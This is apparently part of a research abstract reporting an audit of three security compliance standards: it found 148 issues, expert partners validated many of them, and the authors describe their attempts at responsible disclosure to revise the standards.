We find that when compliance standards are used literally as checklists — a common occurrence, as confirmed by compliance experts — their technical controls and processes are not always sufficient. Security concerns can exist even with perfect compliance. We identified 148 issues of varying severity across three standards; our expert partners assessed 49 of these issues and validated that 36 were present in their own environments and 10 could plausibly occur elsewhere. We also discovered that no clearly-defined process exists for reporting security concerns associated with compliance standards; we report on our varying levels of success in responsibly disclosing our findings and influencing revisions to the affected standards. Overall, our results suggest that auditing compliance standards can provide valuable benefits to the security posture of compliant organizations.
